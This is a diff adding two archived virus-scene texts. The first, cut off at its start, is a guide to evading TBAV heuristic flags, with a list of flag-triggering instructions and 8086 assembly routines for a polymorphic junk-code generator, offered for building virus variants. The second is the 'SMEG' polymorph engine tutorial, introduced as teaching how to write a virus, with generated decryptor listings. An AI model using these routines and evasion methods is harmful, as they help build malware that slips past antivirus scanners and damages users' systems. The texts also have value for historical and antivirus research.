+ is set will trigger the @ flag. Due to the way the opcode bit fields
+ where designated there is a set of 'mirror' opcodes that perform
+ the same function but with the register fields reversed and the direction
+ bit set instead of clear (see appendix A). The same holds true for the xchg
+ group of instructions.
+
+ I believe that tbav uses a combination of a mathematical approach to counting
+ the incidence of opcodes and addressing modes and computing the statistical
+ likelihood of their occurrences as well as looking for specific opcodes
+ and opcode sequences. This is a good reason that code produced by engines
+ like PSE,MIME,MTE,TPE,PME,DSCE,DSME and VICE will give lots and lots of
+ flags. If we count the incidence of each opcode and then do a frequency
+ analysis on them we can come up with a fairly decent picture of your average
+ program versus the kind of garbage produced by most poly engines.
+
+ To be honest, it seems the only opcodes you can get away with and still
+ gaurentee no @ flag is mov's, xchg's and push/pop pairs.
+ That leaves the entire slew of mathematical and logical instructions
+ to be re-explored however. That also leaves the standard flow control (CMP/JZ)
+ pairs. I tested one version of shit that was getting 0 flags by adding
+ cmp/jz/jnz/jo etc random flow control and started getting flags.
+ Hard to pin down the cause here.
+
+ Which leads us to the issue of the G garbage flag.
+ Tbav is fairly intelligent and will flag G on almost any sequence of
+ instructions that look like garbage to the naked eye so you really have
+ to avoid producing code that looks like utter nonsense. The majority
+ of actual program code consists of
+
+ 1 moves to registers from memory (setup)
+ 2 moves to registers of immediate values
+ 3 moves to memory of registers or immediate values
+ 4 moves to registers of registers
+ 5 pushes and pops to move registers to other registers
+ 6 occasional interupts to various system services
+ 7 compares with branches
+ 8 logical instructions like and,or,ror,sal etc
+ 9 mathemetical instructions like add,sub (pretty rare actually)
+
+ I think that item number 6 needs more looking into.
+ If I start debugging and see 200 bytes go by without a single Int21
+ or Int10 or *SOMETHING* I think I would be pretty suspicious.
+ I bet TBAV assumes the same here.
+ Basically,if the code looks completely absurd with debug then I'm
+ 100% positive tbav will flag it as something as well.
+
+ The U undocumented interupt flag.
+
+ There's no denying the fact that TBAV has a flaw in it. It will sometimes
+ produce this flag even when there are no such Int's in the tested code.
+ Either that or there is a slim (but intentional?) random chance that
+ mov ax,4C00h Int 21h will be flagged as undocumented.
+ Maybe Franz wants an extra margin of safety.?:)
+
+ The J suspicious jump construct flag.
+
+ Programs like SMEG and others that overindulge in random flow control
+ will cause this. Pare down the level of random flow control. The main
+ thing I have noticed is that in most engines there is a total lack
+ of control in the 'randomocity' of the code generated. You have to
+ control it. Make it far less random. Make it look much more like
+ the genuine article. (Speaking of which, I'm sure I'm not the first person
+ to think of 'code theiving'. Actually going out and trying to find some
+ chunk of code in the host or something to plunk down as our new entry
+ header. I wonder if this could be done..)
+ You might be better off avoiding random flow control entirely and
+ lightening up your engine a bit in the process.
+
+ The R Terminate and stay resident flag.
+
+ This technically shouldn't be a flag any polymorphic engine should have
+ to worry about but alas, Franz has an itchy trigger finger.
+ You may occasionally see this if you have the instruction
+
+ mov [si],bx
+
+ anywhere in your code. Actually, this brings us to the point of the 'known
+ flags' triggers. Here is a partial list:
+
+ cmp ah,4Bh   ; program infects on execution.
+
+ cmp ah,11h   ;stealth virus flag
+ cmp ah,12h   ;ditto
+ cmp ah,42h   ;ditto
+ cmp ah,43h   ;ditto
+
+ mov ah,40h   ;program may be capable of infecting a file.
+
+ Int 27h      ;tsr ;)
+
+ mov ah,37h   ;tsr
+ .....
+ int 21h
+
+============================================================================
+Appendix A
+
+; I have taken the liberty of assembling some routines that use the bit
+; field patterns of opcodes to produce opcodes of a limited type each
+; These may help you in creating your own variants.
+; The actual engine must still create the framework that is padded out
+; with the 'filler'. The following routines total 299 bytes including
+; random number generators and local variables.
+; they assume ds:di is the destination for the garbage opcodes
+; and use destroy the contents of ax and bx
+
+padit:
+; lay down between 2 and 5 filler opcodes selected from the available
+; types
+                call get_rnd   ;get a random number for fill count
+                and ax,03h     ;
+                inc ax
+                inc ax         ;min 2,max 5 opcodes
+do_cx_rnd:      push ax
+new_fill:       mov ax, (end_op_table-op_table)/2 ;select the type of
+                call rand_in_range                ;filler
+                cmp ax,word ptr [last_fill_type]
+                jz new_fill      ;avoid same types in a row
+                mov word ptr [last_fill_type],ax
+                add ax,ax
+                mov bx,ax
+                call word ptr cs:[op_table+bx]
+                pop ax
+                dec ax
+                jnz do_cx_rnd
+                ret
+
+; 38 bytes
+
+op_table: dw offset move_with_mem     ;here we can weight the frequencies
+          dw offset move_with_reg     ;a bit by inserting a subroutine
+          dw offset move_imm          ;more than once
+          dw offset reg_exchange
+          dw offset do_push_pop
+end_op_table:
+last_fill_type dw 0
+shit_range dw 0
+shit_range_base dw 0
+; 16 bytes
+
+move_imm:
+; makes an opcode of type mov reg,immediate value
+; either 8 or 16 bit value
+; but never ax or al or sp,di,si or bp
+
+      call get_rnd
+      and al,0Fh  ;get a reggie
+      or al,0B0h   ;make it a mov reg,
+      test al,00001000b
+      jz is_8bit_mov
+      and al,11111011b ; make it ax,bx cx or dx
+      mov ah,al
+      and ah,03h
+      jz move_imm           ;not ax or al!
+      stosb
+      call rand_16
+      stosw
+      ret
+is_8bit_mov:
+      mov bh,al   ;
+      and bh,07h  ; is al?
+      jz move_imm ; yeah bomb
+      stosb
+      call get_rnd
+      stosb
+      ret
+
+;37 bytes
+
+
+move_with_mem:
+; ok now we get busy with type mov reg,[mem] and type mov [mem],reg
+; but never move ax,[mem] or mov al,[mem]
+; or any moves involving bp,sp,di or si
+; note:
+; shit_range_base is a pointer to mem ok to mess with in the new
+; host + virus combo. This would be somewhere in the current segment
+; after the virus code and below the reserved stack area.
+; shit_range is typically (65536 - stack_allocation) - shit_range_base
+; shit_range_base is typically host_size+virus_size+safety_margin
+
+    call rand_16
+    and ax,0011100000000011b  ;preserve reggie,from/to mem and 8/16 bit
+    or  ax,0000011010001000b  ;or it with addr mode imm 16 and make it mov
+    test al,00000001b
+    jnz is_16bitter
+    cmp ah,00000110b       ;reggie = al?
+    jz make_to_mem
+    jmp all_clear_for_mem
+is_16bitter:
+    and ah,00011110b        ;make it ax,bx,cx or dx
+    cmp ah,00000110b        ;is reggie = ax?
+    jnz all_clear_for_mem   ;yes, make it to mem
+make_to_mem:
+    and al,11111101b       ; make it to mem
+all_clear_for_mem:
+    stosw
+    mov ax,[shit_range] ;this will be zero if there not enuff room to define
+    or ax,ax
+    jnz shit_ok
+    dec di
+    dec di
+    ret              ;there is no shit range defined so abort!
+shit_ok: xor ah,ah
+    call rand_in_range
+    add ax,[shit_range_base]
+    stosw
+    ret
+; 54 bytes
+
+
+move_with_reg:
+; ok now we knock boots with mov reg,reg's
+; but never to al or ax.
+
+    call rand_16
+    and ax,0011111100000001b  ;preserve reggies and 8/16 bit
+    or  ax,1100000010001010b  ;or it with addr mode and make it mov
+reg_test:
+    test al,1
+    jz is_8bit_move_with_reg
+    and ah,11011011b         ;make source and dest = ax,bx,cx,dx
+is_8bit_move_with_reg:
+    mov bl,ah
+    and bl,00111000b
+    jz move_with_reg       ;no mov ax, 's please
+    mov bh,ah              ;let's see if 2 reggies are same reggies.
+    sal bh,1
+    sal bh,1
+    sal bh,1
+    and bh,00111000b
+    cmp bh,bl              ;reg,reg are same?
+    jz move_with_reg       ;dho!
+    stosw
+    ret
+
+; 39 bytes
+
+reg_exchange:
+; modify a mov reg,reg into an xchg reg,reg
+
+  call move_with_reg  ;make a mov reg,reg
+  dec di              ;but then remove it
+  dec di         ;and take advantage of the fact the opcode is still in ax
+  test al,1b        ;was a 16 bit type?
+  jnz reg_exchange  ;yeah go for an 8 bitter
+  mov bh,ah
+  and bh,07h         ;is one of reggies ax?
+  jz reg_exchange    ;yah so bomb
+  mov al,10000110b   ;else make it xchg ah,dl etc.
+  stosw
+  ret
+
+; 19 bytes
+
+; we can get slick and use the above routines to create a mov instruction
+; and then modify it into a math or cmp preserving the pre assembled
+; addressing mode
+
+make_math_with_mem:
+  call mov_with_mem
+  push di
+  sub di,4
+  mov al,byte ptr [di]
+  and al,00000011b     ;preserve the pertinent address mode info
+  push ax
+  call get_rnd
+  and al,00111000b     ;weed out a new opcode like sub,add etc..
+  pop bx
+  or al,bl               ;set the address mode bits
+  mov byte ptr  [di],al  ;a new instruction is born!
+  pop di                ;restore our pointer
+  ret
+
+; 26 bytes :)
+
+
+do_push_pop:
+; we don't have to watch our stack if we pair up pushes with pops
+; so I slapped together this peice of shoddy work to add em.
+
+        mov ax,(end_bytes_2-bytes_2)/2
+        call rand_in_range
+        add ax,ax
+        mov bx,ax
+        mov ax,word ptr [bytes_2+bx]
+        stosw
+        ret
+bytes_2:
+        push ax
+        pop dx
+        push ax
+        pop bx
+        push ax
+        pop cx
+        push bx
+        pop dx
+        push bx
+        pop cx
+        push cx
+        pop bx
+        push cx
+        pop dx
+end_bytes_2:
+; 31 bytes
+
+; the following random number gen routines where originated by rhincewind
+; his random in range routine is great :)
+
+
+rand_in_range:  push bx      ;returns a random num between 0 and entry ax
+                push dx
+                xchg ax,bx
+                call get_rnd
+                xor dx,dx
+                div bx
+                xchg ax,dx  ;dx=remainder
+                pop dx
+                pop bx
+                ret
+get_rnd:
+; simple timer based random numbers but with a twist using xor of last one
+; also originated by RhinceWind.
+                in ax,40h
+                xor ax, 0FFFFh
+                org $-2
+Randomize       dw ?
+                mov [Randomize],ax
+                ret
+
+rand_16:
+; a small variation to compensate for lack of randomocity in the
+; high byte of 16 bit result returned by get_rnd
+                call get_rnd
+                mov bl,al
+                call get_rnd
+                mov ah,bl
+                ret
+;39
+
+
+
+
+============================================================================
+Appendix B
+
+ Instruction Bitfeild Layouts
+
+ Section 1 - 8 basic arithmetic intructions bit feild layout.
+ Covers reg,mem  mem,reg and reg,reg but not immediates.
+
+
+first byte                    second byte - register and address mode
+       op                     mode dest  source
+      /   \                   / \ /  \  /  \
+  7 6 5 4 3 2 1 0             7 6 5 4 3 2 1 0
+  0 0 |     0 | |             |   |     |
+      |       | 1 = 16 bit    |   |     0 0 0 = [BX+SI+] if index mode
+      |       | 0 = 8 bit     |   |     0 0 1 = [BX+DI+]
+      |       1 = to reg      |   |     0 1 0 = [BP+SI+]
+      |       0 = to mem      |   |     0 1 1 = [BP+DI+]
+      |                       |   |     1 0 0 = [SI+]
+      0 0 0 = add             |   |     1 0 1 = [DI+]
+      0 0 1 = or              |   |     1 1 0 = [BP+]
+      0 1 0 = adc             |   |     1 1 1 = [BX+]
+      0 1 1 = sbb             |   0 0 0 = AX (al) register map
+      1 0 0 = and             |   0 0 1 = CX (cl)
+      1 0 1 = sub             |   0 1 0 = DX (dl)
+      1 1 0 = xor             |   0 1 1 = BX (bl)
+      1 1 1 = cmp             |   1 0 0 = SP (ah)
+                              |   1 0 1 = BP (ch)
+                              |   1 1 0 = SI (dh)
+                              |   1 1 1 = DI (bh)
+                              0 0 - register index only (unless bp)
+                              If index reg is [bp+] then
+                              0 0 = [1000h] 16 bit long only
+                              (there is no [bp] only mode)
+                              0 1 - immediate is 8 bit short adrress
+                              1 0 - immediate is 16 bit long address
+                              1 1 register to register
+                                  source bits are second register using
+                                  same encoding as destination reg above.
+
+
+; Note : If bit 2 of first byte is 1 then it is type immediate value to
+; register : bit 1 (direction bit) will always be a
+; zero, bit 0 specifies immediate to an 8 bit register with a single
+; byte operand (0) or immediate to an 8 bit register with a word operand(1).
+; byte 2 has the destination register using the above encoding only
+; moved to the low 3 bits with bits 3,4,5 clear and bits 6 and 7 always
+; set.
+; operations of type add [memlocation], immediate are in the special
+; 'FF' family to be described later.
+
+
+ Section 2 ,the 'HiBit' series. Note bits 1 and 0 of first byte
+ and second byte (addressing mode) is the same as above.
+
+    first byte
+      op                           second byte - same as above
+     /   \
+ 7 6 5 4 3 2 1 0
+ 1 0 |     0 x x - see above
+     0 0 0 - Mov
+     0 0 1 -
+     0 1 0 -
+     0 1 1 -
+     1 0 0 -
+     1 0 1 -
+     1 1 0 -
+     1 1 1 -
+
+
+
+
+
+
+
+ Section 3 - The '40' series Pushes and pops
+
+ 7 6 5 4 3 2 1 0
+ 0 0 0 1 x x x x
+         | |
+         | 0 0 0 Ax
+         | 0 0 1 bx
+         | 0 1 0 cx
+         | 0 1 1 dx
+         | 1 0 0 bp
+         | 1 0 1 sp
+         | 1 1 0 si
+         | 1 1 1 di
+         |
+         0 Push
+         1 Pop
+
diff --git a/textfiles.com/virus/polymorf.txt b/textfiles.com/virus/polymorf.txt
new file mode 100644
index 00000000..99facaae
--- /dev/null
+++ b/textfiles.com/virus/polymorf.txt
@@ -0,0 +1,750 @@
+=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-                
+
+ Hey Guyz, 
+
+   Another fine release from iLLEGALITY, this time its how to write your own
+virus, and get your name in all the computer magazines. I didn't actually
+write this thing, the Black Baron did, so don't come running to me when
+your test virus wipes your hd, i just distributed the thing. Well anyway
+enjoy d00ds, cya at my next release.
+
+ Dr d00m.
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+����������������������������������������������������������������ͻ
+� A GENERAL DESCRIPTION OF THE METHODS BEHIND A POLYMORPH ENGINE �
+�                      (C) The Black Baron                       �
+����������������������������������������������������������������ͼ
+
+This .TXT attempts to provide an insight into the workings of a Polymorph
+Engine.  It assumes you are familiar with 8086 assembler and the logic
+functions XOR, AND & OR.  To this end, no explanation of logic or assembler
+will be included in this text!  Also note, no SEGMENT stuff will be included
+in any of the assembler listings, it is assumed that you know which segments
+are in play.  The methods described in this .TXT are the ones used in my SMEG
+(Simulated Metamorphic Encryption Generator) Polymorph Engine and are by no
+means the only way to do it!
+
+A small glossary of terms used in this document:
+�����������������������������������������������
+
+      ENCRYPT     = Transform from it's original form to an altered form.
+      DECRYPT     = Transform from it's altered form to it's original form.
+      KEY         = The register or value used to encrypt/decrypt with.
+      SLIDING KEY = A KEY value that is INCREASED or DECREASED on each loop.
+      COUNT       = The number of bytes in the encrypted code or data.
+      INDEX       = A pointer to the encrypted code or data.
+      SIGNATURE   = A unique group of bytes that can be used to check against
+                    a programs content in the hope of detecting a particular
+                    program.
+      HEURISTIC   = A set of well defined rules to apply to a problem in the
+                    hope of achieving a known result.
+
+Question:  What is a Polymorph?
+�������������������������������
+Answer:    Well, the Longman English Dictionary defines it as:
+
+   "POLYMORPHOUS also POLYMORPHIC adj fml or tech.
+     EXISTING IN VARIOUS DIFFERENT FORMS."
+
+In other words, something that has the ability to change it's shape.  Other
+ways to describe such a thing might be;  Mutable, Metamorphic, Etc...
+
+Question:  What is a Polymorph Engine?
+��������������������������������������
+Answer:    A program with the abilities to encrypt (or jumble up) another
+           program or data and provide a unique decryptor for it, it must
+           do this in such a way that no two encryptions of the same program
+           or data will look alike.
+
+Example:  Take the following ultra-simple decryptor:
+
+               MOV      SI,jumbled_data     ;Point to the jumbled data
+               MOV      CX,10               ;Ten bytes to decrypt
+main_loop:     XOR      BYTE PTR [SI],55    ;XOR (un_scramble!) a byte
+               INC      SI                  ;Next byte
+               LOOP     main_loop           ;Loop for the 9 remaining bytes
+
+This small program will XOR the ten bytes at the location pointed to by SI
+with the value 55.  Providing the ten bytes were XORed with 55 prior to
+running this decryptor the ten bytes will be restored to their original
+state.  If you are unsure as to why this is, brush up on your XOR logic!!
+
+Ok, so you might say that if you change the KEY value on each generation it
+will become Polymorphic?  Well, yes and no!  If you did that, the encrypted
+portion would be Polymorphic, but the decryptor would still remain mostly the
+same, the only change begin the KEY value!  So, a signature scanner that
+allows WILDCARDS (and most do!) would still be able to find your decryptor!
+
+One way you could fool some signature scanners is to swap around some of the
+instructions.  So, with this in mind, the above decryptor might look like:
+
+               MOV      CX,10
+               MOV      SI,jumbled_data
+main_loop:     XOR      BYTE PTR [SI],55
+               INC      SI
+               LOOP     main_loop
+
+As you can see, still not much of a change, not really enough to fool some of
+the better signature scanners.
+
+"GET TO THE POINT!  WHAT IS A TRUE POLYMORPH?", I hear you cry!
+���������������������������������������������������������������
+
+Well, a "true" Polymorph would be a decryptor that looks completely different
+on each generation!  Take the following decryptor:
+
+               MOV      CX,10
+               NOP
+               NOP
+               MOV      SI,jumbled_data
+               NOP
+main_loop:     NOP
+               NOP
+               XOR      BYTE PTR [SI],55
+               NOP
+               INC      SI
+               NOP
+               NOP
+               NOP
+               NOP
+               LOOP     main_loop
+
+This decryptor is the same as the one before it, but it has has a few random
+NOP instructions peppered throughout itself.  On each generation you would
+vary the amount of NOPs after each instruction.  This is a Polymorph in it's
+simplest form.  Still, most of the good signature scanners would have no
+problem with such a simple Polymorph.  They would simply skip the NOPs, thus
+having a clear view of the decryptor, to which they could apply a signature!
+
+No, a "true" Polymorph has to be far far more complex then this!  Instead of
+peppering NOPs throughout the decryptor it would pepper totally random amounts
+of totally random 8086 instructions, including JUMPS and CALLS.  It would
+also use a different main decryptor (possibly from a selection of pre-coded
+ones) and would alter all the registers that the decryptor uses on each
+generation, making sure that the JUNK code that it generates doesn't destroy
+any of the registers used by the real decryptor!  So, with these rules in
+mind, here is our simple decryptor again:
+
+               MOV      DX,10              ;Real part of the decryptor!  
+               MOV      SI,1234            ;junk
+               AND      AX,[SI+1234]       ;junk
+               CLD                         ;junk
+               MOV      DI,jumbled_data    ;Real part of the decryptor!
+               TEST     [SI+1234],BL       ;junk
+               OR       AL,CL              ;junk
+main_loop:     ADD      SI,SI              ;junk instruction, real loop!
+               XOR      AX,1234            ;junk
+               XOR      BYTE PTR [DI],55   ;Real part of the decryptor!
+               SUB      SI,123             ;junk
+               INC      DI                 ;Real part of the decryptor!
+               TEST     DX,1234            ;junk
+               AND      AL,[BP+1234]       ;junk
+               DEC      DX                 ;Real part of the decryptor!
+               NOP                         ;junk
+               XOR      AX,DX              ;junk
+               SBB      AX,[SI+1234]       ;junk
+               AND      DX,DX              ;Real part of the decryptor!
+               JNZ      main_loop          ;Real part of the decryptor!
+
+As you should be able to see, quite a mess!!  But, still executable code.
+It is essential that any junk code generated by the Polymorph Engine is
+executable, as it is going to be peppered throughout the decryptor.  Note, in
+this example, that some of the junk instructions use registers that we are
+using in the decryptor!  This is fine, providing the values in these
+registers aren't destroyed.  Also note, that now we have random registers and
+random instructions on each generation it makes signature scanning (even for
+the clever signature scanners) impossible!  Instead, an HEURISTIC method must
+be used, which can lead to false alarms.
+
+So, a Polymorph Engine can be summed up into three major parts:
+���������������������������������������������������������������
+
+  1 .. The random number generator.
+  2 .. The junk code generator.
+  3 .. The decryptor generator.
+
+There are other discrete parts but these three are the ones where most of the
+work goes on!
+
+How does it all work?  Well, SMEG goes about generating random decryptors in
+the following way:
+
+  1 .. Chooses a random selection of registers to use for the decryptor.
+       Leaving the remaining registers as "junk" registers for the junk code
+       generator.
+
+  2 .. Chooses one of the compressed pre-coded decryptors.
+
+  3 .. Goes into a loop generating the real decryptor, peppered with junk
+       code.
+
+To understand how the selected registers are slotted into the decryptors and
+the junk code you must look at the 8086 instructions from a binary level:
+
+      XOR   AX,AX    =    00110001 11000000
+      XOR   AX,CX    =    00110001 11001000
+      XOR   AX,DX    =    00110001 11010000
+      XOR   AX,BX    =    00110001 11011000
+
+You should be able to see a pattern in the binary code for these four 8086
+instructions?  Well, all 8086 instructions follow logical patterns, and it is
+these patterns that tell the 8086 processor which registers/addressing mode
+to use for a particular instruction.  The total amount of instruction formats
+and the precise logic regarding the patterns is too complex to go into here. 
+However, all good 8086 tutorials/reference guides will explain in full.
+
+SMEG exploits this pattern logic to generate junk code and decryptors with
+random registers, as the patterns directly relate to the registers Etc.
+
+SMEG generates junk code in the following way:
+����������������������������������������������
+
+Inside SMEG there is a table of the basic binary patterns for all of the 8086
+instruction set, but with one important difference, all the register/address
+mode bits are zero.  This is called the SKELETON INSTRUCTION TABLE.  The
+table also contains various other bytes used by SMEG to determine the
+relevant bit positions to "plug in" the register bit patterns.  These
+patterns are plugged in via the logic processes OR and AND.  Using this
+method, SMEG can generate endless amounts of random 8086 instructions without
+destroying any of the registers used by the decryptor proper.
+SMEG also contains some discrete logic for producing false CALLS to dummy
+subroutines and also false conditional JMPS around the junk code.
+
+SMEG generates the decryptor proper in the following way:
+���������������������������������������������������������
+
+Inside SMEG there is a table containing a selection of common 8086
+instructions used in decryptors, such as XOR [index],reg Etc.  These are,
+again, stored in SKELETON FORM with some control bytes used by the decryptor
+generator.  Also, inside SMEG, there are several pre-coded decryptors stored
+in a compressed form.  On average, a complete decryptor can be described to
+the decryptor generator in as few as 11 bytes and adding to the list of
+pre-coded decryptors is both painless and economical with space!
+
+SMEG generates the Polymorphed decryptor in the following way:
+��������������������������������������������������������������
+
+First it chooses, at random, one of the pre-coded compressed decryptors. 
+Next it goes into a loop uncompressing each decryptor instruction, plugging
+in the required registers, storing it and then generating (for each real
+instruction) a random amount of random instructions.  This loop repeats until
+the complete decryptor has been constructed.  The final result is a random
+size, random register, random patterned decryptor!
+
+It should also be noted that whenever SMEG generates an INDEXed instruction
+it uses either SI, DI or BX at random, also it sometimes uses a random offset.
+For example, say the encrypted code started at address 10h, the following
+could be used to index this address:
+
+       MOV   SI,10h     ;Start address
+       MOV   AL,[SI]    ;Index from initial address
+
+But sometimes SMEG will generate something like the following, again based on
+the encrypted code starting at address 10h:
+
+       MOV   DI,0BFAAh      ;Indirect start address
+       MOV   AL,[DI+4066h)  ;4066h + 0BFAAh = 10010h (and FFFF = 10h)!!
+
+These indexed and initial values are picked at complete random, and the
+examples of 0BFAAh and 4066h are valid, but next time they will be completely
+different!
+
+The following are two decryptors that were generated with my SMEG Polymorph
+Engine.  It should be noted that I generated 4000 examples with no two alike!
+Unfortunately I ran out of hard drive space!  But it is fairly safe to say
+that the total number of decryptor combinations would run into the BILLIONS!
+
+All the lines marked with ";junk" in the following listings indicate random
+junk instructions that were inserted throughout the actual decryptor, note
+that SMEG has the ability to generate junk CALLS to false SUBROUTINES, as
+well as general junk conditional jumps!  All lines marked with a * indicate
+an actual part of the decryptor proper.  I chose the two generations shown
+because their sizes were similar, 386 and 480 bytes.  SMEG produces
+decryptors ranging in size from as little as 288 to as much as 1536 bytes.
+Even if two decryptors are generated that are the same size the chances of
+them being the same are, literally, billions to one!
+
+
+;Assembler listing for decryptor 1, size 368 bytes.
+;��������������������������������������������������
+;Size of the encrypted code was 07DBh (2011 bytes)
+;The encrypted code started at address 0270h
+
+;This decryptor was generated to use the following registers:
+;
+;   DX = Count of bytes in the encrypted code
+;   BX = Index pointing to the encrypted code
+;   AL = The encryption key
+;   CL = General work register
+
+0100    JNS     0103            ;junk
+0102    CLD                     ;junk
+0103    SAR     SI,CL           ;junk
+0105    CMP     BP,0708         ;junk
+0109    STC                     ;junk
+010A    JG      010E            ;junk
+010C    OR      SI,CX           ;junk
+010E    XOR     DI,3221         ;junk
+0112    ADD     BP,0805         ;junk
+0116    AND     BP,3512         ;junk
+011A    SHR     SI,CL           ;junk
+011C    MOV     SI,1B04         ;junk
+0120    SAR     DI,CL           ;junk
+0122    ADC     SI,2506         ;junk
+0126    ADC     DI,1F11         ;junk
+012A    SBB     BP,[0F3E]       ;junk
+012E    CMP     BP,3F1E         ;junk
+0132    DEC     SI              ;junk
+0133    NOT     DI              ;junk
+0135    AND     SI,083D         ;junk
+0139    INC     SI              ;junk
+013A    SBB     DI,0103         ;junk
+
+013E    MOV     DX,1791         ;*  Set up the COUNT register
+                                ;   3x Actual number of bytes!
+
+0141    CLD                     ;junk
+0142    JB      0146            ;junk
+0144    TEST    SI,AX           ;junk
+0146    SBB     DI,SP           ;junk
+0148    TEST    DI,[251B]       ;junk
+014C    TEST    CL,[SI]         ;junk
+014E    SHL     BP,1            ;junk
+0150    MOV     BX,017D         ;junk
+0153    CMC                     ;junk
+0154    MOV     DI,1218         ;junk
+0158    JO      015C            ;junk
+015A    RCR     DI,1            ;junk
+015C    STC                     ;junk
+015D    CMP     BP,DI           ;junk
+
+015F    MOV     AX,CS           ;*  Get CODE SEG in AX
+
+0161    TEST    CH,[BX+17]      ;junk
+0164    SBB     BP,3107         ;junk
+0168    INC     DI              ;junk
+0169    RCR     BP,1            ;junk
+
+016B    MOV     DS,AX           ;*  Make DATA SEG = CODE SEG
+
+016D    ADD     DI,[3B04]       ;junk
+
+0171    MOV     AL,50           ;*  Set up decrypt KEY reg
+
+0173    JNB     0179            ;junk
+0175    MOV     SI,1439         ;junk
+0179    JB      017D            ;junk
+017B    ADC     DI,AX           ;junk
+017D    JMP     0185            ;junk
+0180    MOV     BP,1B36         ;junk
+0184    RET                     ;junk
+0185    RCR     SI,1            ;junk
+
+0187    MOV     BX,842D         ;*  Set up the INDEX register
+
+018A    SUB     SI,CX           ;junk * Decryptor MAIN LOOP
+
+018C    OR      DI,0B0F         ;junk
+0190    MOV     BP,1E3E         ;junk
+0194    RCL     DI,CL           ;junk
+0196    SUB     BP,2E12         ;junk
+019A    ADD     DI,[2E2A]       ;junk
+019E    ROL     SI,CL           ;junk
+
+01A0    MOV     CL,[BX+7E43]    ;*  Get next encrypted byte
+                                ;   NOTE:  original index 842Dh plus 7E43h =
+                                ;   10270h AND FFFFh = 0270h!  Which is the
+                                ;   start of the Encrypted code!
+
+01A4    JZ      01AC            ;junk
+01A6    TEST    BH,[DI+2B3B]    ;junk
+01AA    CMP     [BP+SI],DL      ;junk
+01AC    ROL     DI,1            ;junk
+01AE    SBB     DI,263A         ;junk
+
+01B2    DEC     DX              ;*  Dec the COUNT register (x1)
+
+01B3    CALL    0180            ;junk
+01B6    MOV     DI,CX           ;junk
+01B8    ADC     BP,282E         ;junk
+
+01BC    SUB     CL,AL           ;*  Decrypt byte using KEY reg
+
+01BE    MOV     SI,372A         ;junk
+01C2    TEST    BP,3A10         ;junk
+01C6    CALL    0180            ;junk
+01C9    ADC     SI,1317         ;junk
+01CD    CLD                     ;junk
+
+01CE    INC     AX              ;*  Increase the KEY reg
+
+01CF    XOR     SI,203D         ;junk
+01D3    JMP     01E1            ;junk
+01D6    DEC     DI              ;junk
+01D7    CMC                     ;junk
+01D8    SUB     BP,[3624]       ;junk
+01DC    XOR     SI,0200         ;junk
+01E0    RET                     ;junk
+01E1    CMP     [SI+13],BH      ;junk
+
+01E4    SUB     DX,0001         ;*  Dec the COUNT register (x2)
+
+01E8    CMP     AX,0517         ;junk
+01EC    SUB     BP,2816         ;junk
+01F0    AND     SI,0807         ;junk
+01F4    SUB     SI,2E03         ;junk
+01F8    ROR     BP,1            ;junk
+01FA    INC     DI              ;junk
+01FB    RCR     SI,CL           ;junk
+01FD    TEST    CH,DH           ;junk
+01FF    SUB     BP,1026         ;junk
+
+0203    MOV     [BX+7E43],CL    ;*  Store the decrypted byte
+
+0207    JNB     020D            ;junk
+0209    XOR     DI,1B30         ;junk
+020D    CLD                     ;junk
+020E    ADD     SI,3C38         ;junk
+
+0212    INC     BX              ;*  Increase the INDEX reg
+
+0213    XOR     DI,0B2C         ;junk
+0217    JMP     022F            ;junk
+021A    OR      BP,1C18         ;junk
+021E    JLE     0221            ;junk
+0220    DEC     BP              ;junk
+0221    ADC     SI,0E32         ;junk
+0225    AND     DI,1522         ;junk
+0229    CMP     [BP+SI+36],BH   ;junk
+022C    ROL     SI,1            ;junk
+022E    RET                     ;junk
+022F    SHL     DI,1            ;junk
+0231    SHR     DI,1            ;junk
+
+0233    DEC     DX              ;*  Dec the COUNT register (x3)
+                                ;   Hence the 3x original size!
+
+0234    JNZ     023F            ;*  Not zero then jump to 023Fh
+
+0236    TEST    CL,[BP+DI]      ;junk
+0238    ADC     BP,012D         ;junk
+
+023C    JMP     025B            ;*  Finished decrypting!
+
+023F    INC     BP              ;junk
+0240    JNB     0246            ;junk
+0242    CMP     BX,0E2E         ;junk
+0246    TEST    DI,SI           ;junk
+0248    SBB     SI,3233         ;junk
+
+024C    MOV     CX,018A         ;*  Set address of MAIN LOOP
+
+024F    ROL     DI,1            ;junk
+0251    SUB     DI,BX           ;junk
+0253    SHR     DI,1            ;junk
+0255    TEST    BL,[BX+DI+1C2E] ;junk
+
+0259    PUSH    CX              ;*  Stack LOOP address
+025A    RET                     ;*  RETurn to MAIN LOOP
+
+025B    MOV     SI,211F         ;junk
+025F    CMP     BL,[BX+DI]      ;junk
+0261    SUB     BP,2D33         ;junk
+0265    MOV     BP,3735         ;junk
+0269    XOR     SI,SI           ;junk
+026B    MOV     BP,[0A38]       ;junk
+026F    INC     DI              ;junk
+
+0270    The encrypted code starts here.
+
+;****************** End of decryptor 1 assembler listing. *******************
+
+
+;Assembler listing for encryptor 2, size 480 bytes.
+;��������������������������������������������������
+;Size of the encrypted code was 07DBh (2011 bytes)
+;The encrypted code started at address 02E0h
+
+;This decryptor was generated to use the following registers:
+;
+;   AX = Count of bytes in the encrypted code
+;   BX = Index pointing to the encrypted code
+;   DL = The encryption key
+;   CL = General work register
+
+0100    NOT     SI              ;junk
+0102    TEST    CH,[BP+DI+0F]   ;junk
+0105    INC     DI              ;junk
+0106    CLD                     ;junk
+0107    ADC     DI,132A         ;junk
+010B    JPE     0111            ;junk
+010D    OR      DI,332E         ;junk
+0111    INC     SI              ;junk
+0112    TEST    AL,CH           ;junk
+0114    JMP     0120            ;junk
+0117    JPE     011D            ;junk
+0119    CMP     DX,1909         ;junk
+011D    RCR     DI,CL           ;junk
+011F    RET                     ;junk
+0120    INC     DI              ;junk
+0121    TEST    DI,BP           ;junk
+0123    JMP     0133            ;junk
+0126    TEST    DI,0E24         ;junk
+012A    TEST    DI,093A         ;junk
+012E    AND     DI,SP           ;junk
+0130    CMP     [BP+SI],BH      ;junk
+0132    RET                     ;junk
+0133    MOV     BP,0C28         ;junk
+0137    TEST    DH,CH           ;junk
+0139    TEST    BP,1C16         ;junk
+013D    ROR     BP,CL           ;junk
+013F    JZ      0145            ;junk
+0141    TEST    DH,[BX]         ;junk
+0143    ADD     DI,SP           ;junk
